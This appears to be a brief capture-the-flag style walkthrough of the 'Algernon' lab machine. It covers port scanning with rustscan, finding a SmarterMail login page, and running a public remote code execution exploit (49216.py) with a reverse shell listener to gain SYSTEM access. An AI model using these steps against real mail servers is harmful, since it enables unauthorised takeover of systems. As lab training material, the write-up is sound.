# Algernon ## nmap ``` mkdir nmap sudo rustscan -a 192.168.96.65 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan ``` A web server is open on port 9998, also an interesting service is on port 17001.

When I open my browser, the website redirects to a log-in page. ![](https://3211174753-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MhuCb52HTt9nZusE7xn%2F-MkJXNSLl8CFYStdNMAQ%2F-MkJYVSP_OBsspNFZLwA%2Fimage.png?alt=media\&token=84218a5e-b39b-466f-9659-cbf10996e83d) ## Exploitation The website is running `SmarterMail` and looks like there's a Remote Code Execution vulnerability we can try.

Let's mirror this exploit to our local machine.

Edit the script, then set the `HOST` variable with the target IP address, set `LHOST` with your local machine IP address, and set `LPORT` to 80

Setup a reverse shell listener on port 80

Execute the following to run the script, `python3 49216.py` and you should received a shell with `nt authority\system` privilege